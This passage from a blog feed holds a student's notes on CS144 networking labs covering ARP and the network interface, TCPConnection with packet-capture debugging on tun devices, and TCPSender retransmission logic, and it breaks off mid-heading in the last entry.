    <updated>2025-11-24T03:59:39.919Z</updated>
    
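    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes from working through CS144 Computer Networking Lab5 - implementing a <strong>network interface (also called an adapter)</strong></p><p>CS144 Lab5 handout - <a href="https://cs144.github.io/assignments/lab5.pdf">Lab Checkpoint 5: down the stack (the network interface)</a></p><p>My CS144 lab repository - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">II. Environment setup</h2><p>Our lab code currently lives on the <code>master</code> branch, and the starter code has to be merged in before starting the lab, so run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab5-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="三、TCP报文的数据传输方式">III. How TCP segments are carried</h2><p>A TCP segment can be delivered to a remote peer in three ways:</p><ul><li><p><strong>TCP-in-UDP-in-IP</strong>: the user supplies the TCP segment and uses the interface Linux provides, letting the kernel build the UDP header, the IP header, and the Ethernet header and pass the resulting packet down to the next layer. Because the kernel does all of this, it can guarantee that every socket has a <strong>unique combination of local address and port and remote address and port</strong>, and it can keep different processes isolated from each other.</p></li><li><p><strong>TCP-in-IP</strong>: normally a TCP segment is placed directly into an IP datagram as its payload, which is why the pair is called TCP/IP. If user space wants to build the IP datagram itself, it has to go through the <strong>TUN virtual network device provided by Linux</strong>. Once the user writes an IP datagram to the TUN device, the kernel takes care of the rest (building the Ethernet header, sending the Ethernet frame, and so on) without user involvement.</p><blockquote><p>This is exactly the mechanism CS144 used in Lab4; the code is worth a careful read if you are interested.</p></blockquote></li><li><p><strong>TCP-in-IP-in-Ethernet</strong>: both approaches above still rely on the Linux kernel for part of the protocol stack. Every time the user writes an IP datagram to the TUN device, the kernel has to build a suitable link-layer (Ethernet) frame with the IP datagram as its payload. To do that, Linux has to work out the next hop's Ethernet destination address from the next hop's IP address. If Linux does not know that mapping, it broadcasts a query to discover the next hop's address. This job is done by the <strong>network interface</strong> (also called an <strong>adapter</strong>; the two terms are equivalent): it turns each <strong>outbound IP datagram</strong> into a link-layer (Ethernet) frame and hands the frame to a <strong>TAP virtual network device</strong>, which performs the actual transmission.</p><blockquote><p>Familiar network interfaces include eth0, eth1, wlan0, and so on.</p></blockquote><p>Most of a network interface's work is <strong>looking up (and caching) the Ethernet address for each next-hop IP address</strong>. The protocol used for this is the <strong>Address Resolution Protocol, ARP</strong>.</p><p>In this lab we implement such a network interface (I am rather looking forward to it).</p></li></ul><h2 id="四、地址解析协议-ARP">IV. The Address Resolution Protocol (ARP)</h2><p>Before writing any code, we need a brief look at the 
ARP protocol.</p><p>Hosts and routers do not themselves have link-layer addresses; their adapters (that is, their network interfaces) do. A link-layer address is usually called a <strong>MAC address</strong>. When an adapter wants to send a frame to some destination adapter, it puts the destination adapter's MAC address into the frame and sends the frame onto the LAN. Because of broadcasting, an adapter may receive a frame that is not addressed to it, so on receiving a frame it checks the destination and drops any Ethernet frame whose <strong>destination MAC address does not match its own MAC address</strong>.</p><p>Why do adapters have a <strong>link-layer address (MAC address)</strong> in addition to a <strong>network-layer address (IP address)</strong>? There are two reasons:</p><ul><li>LANs are designed for <strong>arbitrary</strong> network-layer protocols, not only for IP and the Internet.</li><li>If adapters used IP addresses instead of MAC addresses, the address would <strong>have to be reconfigured</strong> every time the adapter was moved or restarted.</li></ul><p>Since an adapter has both a network-layer and a link-layer address, the two have to be translated into each other. That translation is the job of the <strong>Address Resolution Protocol</strong>. ARP resembles DNS, with one difference: DNS resolves host names for hosts <strong>anywhere</strong>, whereas ARP resolves IP addresses only for <strong>hosts and router interfaces on the same subnet</strong>.</p><p>Every host or router keeps an ARP table in memory. The table holds the mappings from IP addresses to MAC addresses, along with a time-to-live (TTL) value that indicates when each mapping will be removed from the table, for example:</p><table><thead><tr><th style="text-align:center">IP address</th><th style="text-align:center">MAC address</th><th style="text-align:center">TTL</th></tr></thead><tbody><tr><td style="text-align:center">222.222.222.221</td><td style="text-align:center">aa-bb-cc-dd-ee-ff</td><td style="text-align:center">13:45:00</td></tr><tr><td style="text-align:center">222.222.222.223</td><td style="text-align:center">11-22-33-44-55-66</td><td style="text-align:center">4:34:12</td></tr><tr><td style="text-align:center">…</td><td style="text-align:center">…</td><td style="text-align:center">…</td></tr></tbody></table><p>If the ARP table already holds a MAC mapping for the destination IP address, the adapter simply looks up the destination MAC address and builds an Ethernet frame. If it does not, the sender builds a special packet called an <strong>ARP packet</strong>.</p><p>The fields of an ARP packet include the <strong>sender and target IP addresses and MAC addresses</strong>, and ARP query packets and <strong>response packets</strong> share the same format. The purpose of an ARP query is to ask every other host and router on the subnet which MAC address corresponds to the IP address being resolved.</p><p>When the sending adapter needs to find the destination adapter's MAC address, it sets the frame's destination to the <strong>MAC broadcast address (FF-FF-FF-FF-FF-FF)</strong> so that <strong>every</strong> other adapter on the subnet receives it. Of the adapters that receive the ARP query, <strong>only the one whose IP address matches</strong> sends back an ARP response, after which the sending adapter updates its ARP table and starts sending IP datagrams.</p><p>An ARP query is sent in a <strong>broadcast frame</strong>, whereas an ARP response is sent in a <strong>standard (unicast) frame</strong>. The ARP table is built automatically and needs no manual configuration. If a host disconnects from the subnet, the entries other nodes hold for it in their ARP 
tables are eventually removed automatically as well.</p><p>On the other hand, an <strong>ARP spoofing attack</strong> exploits the fact that <strong>ARP provides no authentication of ARP replies on the network</strong>, which makes man-in-the-middle and DoS attacks easy to mount.</p><blockquote><p>For further details, see the <a href="https://datatracker.ietf.org/doc/html/rfc826">RFC826</a> specification.</p></blockquote><h2 id="五、Network-Interface-具体实现">V. Implementing the Network Interface</h2><p>First, we need three additional data structures:</p><ul><li><p><code>_arp_table</code>: the ARP table, used to look up IP-to-MAC mappings; it also stores the TTL of each ARP entry.</p><blockquote><p>The TTL of an ARP entry is 30 s.</p></blockquote></li><li><p><code>_waiting_arp_response_ip_addr</code>: the ARP requests that have already been sent. Each ARP request must not be sent again within <strong>5 seconds</strong>.</p></li><li><p><code>_waiting_arp_internet_datagrams</code>: the IP datagrams that are <strong>waiting for an ARP reply</strong>. Only when the matching ARP reply arrives and the ARP table is updated does the network interface know which MAC address these datagrams should go to.</p></li></ul><p>When implementing the network interface, the following points must hold:</p><ul><li><strong>The TTL of an ARP entry is 30 s</strong>; once it expires the entry must be removed from the ARP table.</li><li>If, when sending an IP datagram, the destination MAC address is not in the ARP table, send an ARP request immediately and cache the datagram until the destination MAC address is known, then send it.</li><li>An ARP request for the <strong>same target IP</strong> must be sent <strong>at most once every 5 s</strong>.</li><li>If an ARP request has received no response after 5 seconds, <strong>send it again</strong>.</li><li>When the network interface receives an Ethernet frame:<ul><li>it must drop any frame whose destination MAC address is neither the interface's own MAC address nor the broadcast address;</li><li>apart from ARP, which has to compare against its own IP address, <strong>do not compare IP addresses anywhere else</strong>, because the network interface sits at the link layer;</li><li>for an ARP request addressed to itself, ignore the incoming <strong>ARPMessage::target_ethernet_address</strong>: the sender does not know what to put there, so the field is meaningless;</li><li>whether the frame carries an <strong>ARP request or an ARP reply</strong>, as long as it is <strong>explicitly addressed to this interface</strong>, its src_ip_addr and src_eth_addr can be used to update the ARP table.</li></ul></li></ul><p>The full code is here:</p><ul><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/network_interface.cc">network_interface.cc</a></li><li><a href="https://github.com/kiprey/sponge/blob/master/libsponge/network_interface.hh">network_interface.hh</a></li></ul><p>Test results:</p><p><img src="/2021/11/cs144-lab5/image-20211118164207822.png" alt="image-20211118164207822"></p>]]></content>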
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes from working through CS144 Computer Networking Lab5 - implementing a &lt;strong&gt;network interface (also called an adapter)&lt;/strong&gt;&lt;/p&gt;
&lt;p&gt;CS144 Lab5 handout - &lt;a href=&quot;https://cs144.github.io/assignments/lab5.pdf&quot;&gt;Lab Checkpoint 5: down the stack (the network interface)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository - &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab4</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab4/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab4/</id>
    <published>2021-11-08T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.912Z</updated>
    
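    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes from working through CS144 Computer Networking Lab4 - TCPConnection, the complete TCP implementation</p><p>CS144 Lab4 handout - <a href="https://cs144.github.io/assignments/lab4.pdf">Lab Checkpoint 4: the summit (TCP in full)</a></p><p>My CS144 lab repository - <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">II. Environment setup</h2><p>Our lab code currently lives on the <code>master</code> branch, and the starter code has to be merged in before starting the lab, so run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab4-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="三、TCPConnection-简述">III. TCPConnection overview</h2><p>TCPConnection combines TCPSender and TCPReceiver into a single TCP endpoint that sends and receives data at the same time.</p><p>TCPConnection has to follow several rules.</p><p>For <strong>receiving segments</strong>:</p><ul><li><p>If the incoming segment has the RST flag set, put both the inbound and outbound byte streams into the error state and close the TCP connection permanently.</p></li><li><p>If RST is not set, hand the segment to TCPReceiver, which processes its seqno, SYN, payload, and FIN.</p></li><li><p>If the incoming segment has the ACK flag set, tell <strong>this TCPConnection's</strong> <strong>own TCPSender</strong> about the remote endpoint's ackno and window_size.</p><blockquote><p>This step matters a great deal: packets can be reordered in the network, so the ackno the remote sends us lags behind.</p><p>Piggybacking the ackno and window size on outgoing data segments reduces this lag and makes TCP more efficient.</p></blockquote></li><li><p>If the incoming TCP segment carries a <strong>valid seqno</strong>, TCPConnection must send at least one TCP segment in reply to tell the remote endpoint the current ackno and window size.</p></li><li><p>If the incoming TCP segment carries an <strong>invalid seqno</strong>, TCPConnection also has to reply with a similar empty segment. The remote endpoint may send such invalid segments to check whether the connection is still alive and to learn the receiver's current ackno and window size. This is TCP's <code>keep-alive</code>.</p><figure class="highlight cpp"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">if</span> (_receiver.<span class="built_in">ackno</span>().<span class="built_in">has_value</span>() &amp;&amp; seg.<span 
class="built_in">length_in_sequence_space</span>() == <span class="number">0</span> &amp;&amp; seg.<span class="built_in">header</span>().seqno == _receiver.<span class="built_in">ackno</span>().<span class="built_in">value</span>() - <span class="number">1</span>) &#123;</span><br><span class="line">  _sender.<span class="built_in">send_empty_segment</span>();</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure></li></ul><p>For <strong>sending segments</strong>:</p><ul><li>Whenever TCPSender pushes a TCPSegment onto its outgoing queue, TCPConnection has to take it off the queue and send it.</li><li>Before sending a segment, TCPConnection reads the ackno and window size from <strong>its own TCPReceiver</strong>, writes them into the outgoing TCPSegment, and sets its ACK flag.</li></ul><p>TCPConnection has to keep track of time. It has a tick function that the operating system calls periodically. Each time tick is called, TCPConnection must:</p><ul><li>tell TCPSender how much time has passed, which may cause TCPSender to retransmit lost segments;</li><li>send an RST segment if the number of consecutive retransmissions exceeds <code>TCPConfig::MAX_RETX_ATTEMPTS</code>;</li><li>close the TCP connection when the conditions are right (that is, while in the TCP TIME_WAIT state).</li></ul><p>Closing a TCP connection is a little more involved. The main cases are:</p><ul><li><p>After <strong>the receiver gets an RST flag or the sender sends one</strong>, set this TCPConnection's inbound and outbound byte streams to the error state and stop <strong>immediately</strong>. This is an unclean shutdown and may <strong>lose data that has not finished transferring</strong> (for example, segments still in flight are dropped <strong>once the receiver has seen the RST</strong>).</p></li><li><p>Having both sides exit only after the streams have been fully sent and received (a clean shutdown) is somewhat trickier. Here is a diagram of the four-way teardown first:</p><p><img src="/2021/11/cs144-lab4/image-20210515092825158.png" alt="img"></p><p>A quick walk through the teardown:</p><ul><li><p>Once the <strong>client</strong> has sent all of its data, it sends a FIN to tell the server that <strong>the client has finished sending</strong> (finished sending is not the same as <strong>finished being received</strong>). Note that the server can still send data to the client at this point.</p></li><li><p>When the server acks the client's FIN, <strong>the server confirms it has received all of the client's data</strong>.</p></li><li><p>The server keeps sending until all of its own data is out, then sends a FIN to tell the client that <strong>the server has finished sending</strong>.</p></li><li><p>Once the client <strong>sends</strong> an ack for the server's FIN,
<strong>the client confirms it has received all of the server's data</strong>. Note that at this point the client knows that:</p><ul><li>the <strong>server</strong> has received all of the <strong>client's</strong> data;</li><li>the <strong>client</strong> has received all of the <strong>server's</strong> data.</li></ul><p>So the client can be fully confident that <strong>disconnecting now does it no harm</strong>.</p><p>However, as long as the server has not received the client's ACK:</p><ul><li>the server knows it has received all of the client's data;</li><li>the server <strong>does not know whether the client has received all of the server's data</strong>.</li></ul><p>In other words, the server must receive the client's ACK before it can close.</p><p>If the server does not get the client's FIN ACK within the timeout, it retransmits the FIN. But if the client has already gone away, the server will <strong>never receive the client's FIN ACK</strong>. So even after the client has finished all of its own work, it still has to linger for a short while in order to handle a retransmitted FIN from the server.</p><p>Once the server receives the client's FIN_ACK, it closes the connection right away, and the client closes silently after its timeout. Both sides have then received all of each other's data and nothing has been lost.</p><blockquote><p>One important point here: <strong>TCP never ACKs an ACK</strong>. For example, the server does not answer the client's FIN_ACK with a FIN_ACK_ACK.</p></blockquote></li></ul></li></ul><h2 id="四、TCP-状态图">IV. TCP state diagrams</h2><p>Here are two state diagrams for the two sides of a TCP connection; after finishing these labs they are easy to read:</p><p><img src="/2021/11/cs144-lab4/20180328001537836.jpg" alt="image description"></p><p><img src="/2021/11/cs144-lab4/20180328001111303.jpg" alt="image description"></p><h2 id="五、调试">V. Debugging</h2><p>I will not repeat how to debug the test cases, since that was covered earlier: start a gdb session and single-step, it is simple enough. This section records how to debug the virtual NICs that CS144 sets up.</p><p>First start a wireshark capture. There are two ways to do this; one is to capture from the terminal:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> tshark -Pw /tmp/debug.raw -i tun144</span><br></pre></td></tr></table></figure><p>It looks like this:</p><p><img src="/2021/11/cs144-lab4/image-20211115175444352.png" alt="image-20211115175444352"></p><p>The captured packets are also saved to /tmp/debug.raw, which is handy for later analysis.</p><p>Personally I prefer a GUI, so I run the following command instead:</p><blockquote><p>Be sure to use sudo! Otherwise the interfaces will not show up.</p></blockquote><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line"><span class="built_in">sudo</span> wireshark</span><br></pre></td></tr></table></figure><p>Then pick either tun144 or tun145; it makes no difference. I chose tun144.</p><blockquote><p>tun144 and tun145 are the two virtual NICs that CS144 
sets up. The two can talk to each other.</p></blockquote><p><img src="/2021/11/cs144-lab4/image-20211115175613525.png" alt="image-20211115175613525"></p><p>Next, run the following commands in <strong>two</strong> separate terminals so that the two sides connect to each other:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Start a listening server on the tun144 subnet, at 169.254.144.9:9090</span></span><br><span class="line">./apps/tcp_ipv4 -l 169.254.144.9 9090</span><br></pre></td></tr></table></figure><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># Start a client on the tun145 subnet, at 169.254.145.9, connecting to 169.254.144.9:9090</span></span><br><span class="line">./apps/tcp_ipv4 -d tun145 -a 169.254.145.9 169.254.144.9 9090</span><br></pre></td></tr></table></figure><p>The traffic can then be captured in wireshark:</p><p><img src="/2021/11/cs144-lab4/image-20211115180315678.png" alt="image-20211115180315678"></p><p>This is a capture of a faulty TCP exchange. During the three-way handshake the Server apparently never processes the ACK returned by the Client; it keeps retransmitting SYN+ACK until the retransmission limit is hit and the Server drops the connection.</p><p>With the problem located, gdb can be used to dig further. When debugging under gdb, remember to give <code>./apps/tcp_ipv4</code> a larger <code>-t</code> (segment timeout) value so that the sender does not retransmit and clutter the capture.</p><p>This bug cost me a whole evening. In the end it appeared to be a problem with the Tun/Tap mechanism on my machine, which made the <strong>source IP address</strong> of the packets from Client to Server <strong>inconsistent</strong> (compare the first captured packet, <code>169.254.144.1 -&gt; 169.254.144.9</code>, with the third, <code>169.254.145.9 -&gt; 169.254.144.9</code>):</p><blockquote><p>The IP header the Client actually sends is <code>169.254.145.9 -&gt; 169.254.144.9</code>.</p></blockquote><p><img src="/2021/11/cs144-lab4/image-20211115175444352.png" alt="image-20211115175444352"></p><p>As a result, when the Server receives the ACK in the third packet, it decides the packet does not come from the Client, drops it, and keeps waiting for an ACK.</p><p>A temporary workaround is to comment out one check in the <code>TCPOverIPv4Adapter::unwrap_tcp_in_ip</code> function in <code>libsponge/tcp_helpers/tcp_over_ip.cc</code>:</p><figure class="highlight cpp"><table><tr><td 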
class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br></pre></td><td class="code"><pre><span class="line"><span class="function">optional&lt;TCPSegment&gt; <span class="title">TCPOverIPv4Adapter::unwrap_tcp_in_ip</span><span class="params">(<span class="type">const</span> InternetDatagram &amp;ip_dgram)</span> </span>&#123;</span><br><span class="line">    <span class="comment">// is the IPv4 datagram for us?</span></span><br><span class="line">    <span class="comment">// Note: it&#x27;s valid to bind to address &quot;0&quot; (INADDR_ANY) and reply from actual address contacted</span></span><br><span class="line">    <span class="keyword">if</span> (<span class="keyword">not</span> <span class="built_in">listening</span>() <span class="built_in">and</span> (ip_dgram.<span class="built_in">header</span>().dst != <span class="built_in">config</span>().source.<span class="built_in">ipv4_numeric</span>())) &#123;</span><br><span class="line">        <span class="keyword">return</span> &#123;&#125;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    <span class="comment">//! 
<span class="doctag">NOTE:</span> this check is commented out</span></span><br><span class="line">    <span class="comment">// is the IPv4 datagram from our peer?</span></span><br><span class="line">    <span class="comment">// if (not listening() and (ip_dgram.header().src != config().destination.ipv4_numeric())) &#123;</span></span><br><span class="line">    <span class="comment">//     return &#123;&#125;;</span></span><br><span class="line">    <span class="comment">// &#125;</span></span><br><span class="line"></span><br><span class="line">    <span class="comment">// does the IPv4 datagram claim that its payload is a TCP segment?</span></span><br><span class="line">    <span class="keyword">if</span> (ip_dgram.<span class="built_in">header</span>().proto != IPv4Header::PROTO_TCP) &#123;</span><br><span class="line">        <span class="keyword">return</span> &#123;&#125;;</span><br><span class="line">    &#125;</span><br><span class="line"></span><br><span class="line">    [...]</span><br><span class="line">&#125;</span><br></pre></td></tr></table></figure><p>What an ordeal...</p><h2 id="六、具体实现">VI. Implementation</h2><p>This lab is very demanding: the many test cases exercise a large number of edge cases, and the final ones exchange packets over a real network connection. TCPSender and TCPReceiver must be robust enough, otherwise implementing TCPConnection becomes much harder.</p><p>TCPConnection has to handle each incoming segment according to the current TCP state and filter out useless ones. The implementation <strong>must assume that an incoming TCPSegment is untrusted</strong> and validate it step by step with checks before treating it as trustworthy.</p><blockquote><p>Note: be sure to guard against integer-overflow attacks!</p></blockquote><p>The explanations for this part are written as comments in the code, so they are easiest to follow alongside it. The finished implementation is actually not much code, because most of the work (including error handling) can be delegated to TCPSender and TCPReceiver.</p><blockquote><p>This lab therefore depends very heavily on the code written in the earlier labs.</p><p>Bugs from earlier labs that their own tests missed are also likely to surface here, since this is the final part of the TCP labs.</p></blockquote><p>The code is at:</p><ul><li><a href="https://github.com/Kiprey/sponge/blob/master/libsponge/tcp_connection.hh">tcp_connection.hh</a></li><li><a href="https://github.com/Kiprey/sponge/blob/master/libsponge/tcp_connection.cc">tcp_connection.cc</a></li></ul><p>Test results:</p><p><img src="/2021/11/cs144-lab4/image-20211116090253846.png" 
alt="image-20211116090253846"></p><p>benchmark:</p><p><img src="/2021/11/cs144-lab4/image-20211116090556892.png" alt="image-20211116090556892"></p><p>webget talking to a real server:</p><p><img src="/2021/11/cs144-lab4/image-20211116105134413.png" alt="image-20211116105134413"></p><h2 id="七、CS144-模拟网络传输逻辑">VII. How CS144 simulates network transport</h2><p>The code CS144 uses to simulate two hosts talking over a network is quite interesting, so here is a brief look at the overall logic in <code>tcp_ipv4.cc</code>.</p><p>First, <code>tun.sh</code> in the project root uses <code>ip tuntap</code> to create virtual Tun/Tap network devices. These interfaces exist only in the kernel: unlike ordinary network interfaces, they have no physical hardware behind them. The purpose is presumably to imitate a real network environment.</p><blockquote><p>A detailed description of tun/tap: <a href="https://zhuanlan.zhihu.com/p/260405786">虚拟设备之TUN和TAP - 知乎</a></p></blockquote><p>Once the Tun/Tap device is set up, tcp_ipv4.cc creates a <code>TCPOverIPv4OverTunFdAdapter</code>. <code>TunFd</code> refers to the socket attached to the Tun device, and <code>TCPOverIPv4OverTunFdAdapter</code> is an IP-level wrapper around it. When a TCP segment is written through the adapter, it is automatically wrapped in an IP header and sent into the network device. Reading works the other way round: the IP header is stripped and the TCP segment inside is returned.</p><p>Next, on both Server and Client, a new thread is created after the three-way handshake, dedicated to running the eventloop in <code>LossyTCPOverIPv4SpongeSocket</code>. The child thread in turn starts another eventloop and allocates two buffers, one for data written by the user and one for data about to be printed to the screen. When the user types data on stdin, <strong>the poll event registered in the eventloop</strong> fires and the data is written into the local input buffer. When <code>TCPOverIPv4OverTunFdAdapter</code> becomes writable, all data in the local input buffer is written to it and eventually transmitted to the remote side.</p><p>webget talks to a real server in the same way: IP datagrams are written to the tun virtual device, which injects them into the OS network stack, imitating real packet transmission.</p><p>Below are the commands in <code>tun.sh</code> that create the tun device:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment"># start_tun 144</span></span><br><span class="line"><span class="built_in">local</span> TUNNUM=144 TUNDEV=tun144</span><br><span class="line">ip tuntap add mode tun user Kiprey name 
tun144</span><br><span class="line">ip addr add 169.254.144.1/24 dev tun144</span><br><span class="line">ip <span class="built_in">link</span> <span class="built_in">set</span> dev tun144 up</span><br><span class="line">ip route change 169.254.144.0/24 dev tun144 rto_min 10ms</span><br><span class="line">iptables -t nat -A PREROUTING -s 169.254.144.0/24 -j CONNMARK --set-mark 144</span><br><span class="line">iptables -t nat -A POSTROUTING -j MASQUERADE -m connmark --mark 144</span><br></pre></td></tr></table></figure><p>This is quite an interesting piece of code and well worth reading through when time allows.</p>]]></content>
    
    
    <summary type="html">&lt;h2 id=&quot;一、简介&quot;&gt;I. Introduction&lt;/h2&gt;
&lt;p&gt;These are my notes on CS144 Computer Networking Lab4: the complete TCP implementation, TCPConnection.&lt;/p&gt;
&lt;p&gt;CS144 Lab4 handout: &lt;a href=&quot;https://cs144.github.io/assignments/lab4.pdf&quot;&gt;Lab Checkpoint 4: the summit (TCP in full)&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;My CS144 lab repository: &lt;a href=&quot;https://github.com/Kiprey/sponge&quot;&gt;github&lt;/a&gt;&lt;/p&gt;</summary>
    
    
    
    
    <category term="计算机网络" scheme="https://kiprey.github.io/tags/%E8%AE%A1%E7%AE%97%E6%9C%BA%E7%BD%91%E7%BB%9C/"/>
    
    <category term="CS144" scheme="https://kiprey.github.io/tags/CS144/"/>
    
  </entry>
  
  <entry>
    <title>CS144 Computer Networking Lab3</title>
    <link href="https://kiprey.github.io/2021/11/cs144-lab3/"/>
    <id>https://kiprey.github.io/2021/11/cs144-lab3/</id>
    <published>2021-11-07T16:00:00.000Z</published>
    <updated>2025-11-24T03:59:39.911Z</updated>
    
    <content type="html"><![CDATA[<h2 id="一、简介">I. Introduction</h2><p>These are my notes on CS144 Computer Networking Lab3: the TCP sender implementation, TCPSender.</p><p>CS144 Lab3 handout: <a href="https://cs144.github.io/assignments/lab3.pdf">Lab Checkpoint 3: the TCP sender</a></p><p>My CS144 lab repository: <a href="https://github.com/Kiprey/sponge">github</a></p><span id="more"></span><h2 id="二、环境配置">II. Environment setup</h2><p>Our lab code currently lives on the <code>master</code> branch, and some starter code has to be merged in before working on the lab, so run:</p><figure class="highlight bash"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">git merge origin/lab3-startercode</span><br></pre></td></tr></table></figure><p>Then rebuild with make.</p><h2 id="三、TCPSender-简述">III. TCPSender overview</h2><h3 id="1-TCPSender-功能">1. What TCPSender does</h3><p>TCPSender is responsible for sending data as TCP segments. It has to:</p><ul><li><strong>Continuously</strong> send the data in the ByteStream to the receiver as TCP segments.</li><li>Process the ackno and window size reported by the TCPReceiver, in order to track the receiver's current state and detect packet loss.</li><li>Retransmit the original segment if, <strong>after a timeout has elapsed</strong>, <strong>no ack for it has arrived from the TCPReceiver</strong>.</li></ul><h3 id="2-如何检测丢包">2. 
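Detecting packet loss</h3><p>TCP relies on <strong>timeout-based retransmission</strong>. Besides splitting the byte stream into TCP segments and sending them, TCPSender also tracks when each <strong>outstanding segment</strong> (sent but not yet acknowledged) was sent. If an <strong>outstanding segment</strong> goes unacknowledged for too long (that is, the sender has not received an ackno covering it), it must be <strong>retransmitted</strong>.</p><p>Note that <strong>the ackno returned by the receiver does not necessarily line up with a seqno the sender sent</strong> (nor is it tied to one by simple arithmetic), because the receiver may truncate the data it was sent when it runs short of buffer space.</p><p>A segment counts as acknowledged only when <strong>every sequence number it occupies</strong> has been acknowledged. A segment that is only <strong>partially acknowledged</strong> is still treated as outstanding.</p><p>TCP's timeout mechanism is tricky, because it directly affects how responsive an application is when reading from a remote server, as well as how congested the network becomes. Points to keep in mind when implementing TCPSender:</p><ul><li><p>Every few milliseconds TCPSender's tick function is called with the number of milliseconds elapsed since the last call. This is the only notion of time TCPSender may use; calling clock or time directly would break the test suite.</p></li><li><p>TCPSender is constructed with an initial value for the <strong>retransmission timeout (RTO)</strong>. The RTO is the number of milliseconds to wait before resending an outstanding TCP segment. Its value changes over time (or rather, as network conditions change), but the <strong>initial RTO</strong> stays the same.</p></li><li><p>TCPSender needs a <strong>retransmission timer</strong> that triggers some actions when the RTO expires.</p></li><li><p>Whenever a segment <strong>containing data</strong> is sent, start the retransmission timer if it is not already running, so that it expires after RTO milliseconds. Once all <strong>outstanding segments</strong> have been acknowledged, stop the timer.</p></li><li><p>If the retransmission timer expires, do the following (slightly fiddly):</p><ul><li><p>Retransmit the earliest segment not yet fully acknowledged by the TCP receiver (the one with the lowest seqno). This requires storing <strong>outstanding segments</strong> in a separate data structure so that in-flight data can be tracked.</p></li><li><p>If the receiver's window size is nonzero, i.e. it can accept data normally:</p><ul><li>Keep track of the number of <strong>consecutive retransmissions</strong>. Too many of them may mean the network path is broken, in which case retransmission should stop at once.</li><li>Double the RTO, slowing retransmissions on a poor network so as not to worsen congestion.</li><li>Reset and restart the retransmission timer.</li></ul><blockquote><p>The case where <strong>the receiver's window size is 0</strong> is covered below.</p></blockquote></li></ul></li><li><p>When the receiver sends an ack confirming receipt of new data (its absolute ackno is larger than any ackno received before):</p><ul><li>Set the RTO back to its initial value.</li><li>If the sender still has outstanding data, restart the retransmission timer.</li><li>Reset the <strong>consecutive retransmission count</strong> to zero.</li></ul></li></ul><h3 id="3-TCPSender-要求">3. 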
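TCPSender requirements</h3><p>In this lab we need to implement the following four TCPSender interfaces:</p><ul><li><p><strong>fill_window</strong>: TCPSender reads data from the ByteStream and sends it as TCPSegments, filling the receiver's <strong>window</strong> as far as possible. The payload of each TCP segment must not exceed <code>TCPConfig::MAX_PAYLOAD_SIZE</code>.</p><blockquote><p>If the receiver's window size is 0, the sender acts as if it were 1 and keeps sending.</p><p>The segment sent in this situation may well be rejected, but the receiver can report its latest window size in the ack it sends back. If the two sides stopped communicating instead, the sender would never learn how many bytes the receiver can accept once its window opens up again.</p><p>If the remote side does not ack the one-byte segment sent while the window size is 0, <strong>do not double the RTO</strong> when retransmitting. Doubling the RTO is meant to relieve network congestion, but here the segment was dropped because the remote side had no room, not because the network is congested.</p></blockquote></li><li><p><strong>ack_received</strong>: Process the ackno and window size returned by the receiver. Drop segments that are <strong>fully acknowledged but still in the tracking queue</strong>. If the window still has free space, keep sending.</p></li><li><p><strong>tick</strong>: Called to indicate how much time has elapsed. The sender may need to retransmit a segment that has timed out without being acknowledged.</p></li><li><p><strong>send_empty_segment</strong>: Generate and send a TCPSegment that <strong>has length 0 in sequence space</strong> and <strong>a correctly set seqno</strong>. This lets the owner send an empty ACK segment.</p></li></ul><h3 id="4-TCPSender-状态转换图">4. 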
